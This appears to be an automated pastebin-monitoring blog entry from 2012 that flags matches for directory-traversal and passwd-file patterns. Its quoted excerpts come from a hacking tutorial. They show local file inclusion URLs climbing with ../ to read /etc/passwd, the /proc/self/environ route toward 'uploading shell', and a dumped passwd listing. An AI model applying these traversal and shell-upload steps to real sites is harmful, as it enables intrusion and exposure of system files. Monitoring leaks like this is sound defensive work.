Detected 2 occurrence(s) of ‘http:\/\/.*\.\.\/\.\.\/\.\.’:

 below:
Click this bar to view the original image of 743x170px.
You can see here that i found the exact path after putting 19 "../" before "../etc/passwd".
 
You have completed half of your exploit:
 
Now suppose that our injection path looks like - http://www.site.com/index.php?cat=../../../../../../etc/passwd
Now you have to do is that just replace "etc/passwd" with "proc/self/environ" and you will some codes like shown below:
Click this bar to view the original image of 775x363px.
 
Uploading shellNow we have to use Tamper Data to edit our user

Detected 1 occurrence(s) of ‘root:.*:0:0:’:

lude]: failed to open stream: No such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 so we go more directories up 

www.website.com/view.php?page=../../../../../etc/passwd 
we succesfully included the etc/passwd file. 
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin 
daemon:x:2:2:daemon:/sbin:/sbin/nologin 
adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown hal

Source: http://pastebin.com/raw.php?i=2u7GCttE

Tags: Directory Transversal, pastebin.com, UNIX Password File

This entry was posted on Friday, July 27th, 2012 at 06:45 and is filed under PasteMon. You can follow any responses to this entry through the RSS 2.0 feed. Both comments and pings are currently closed.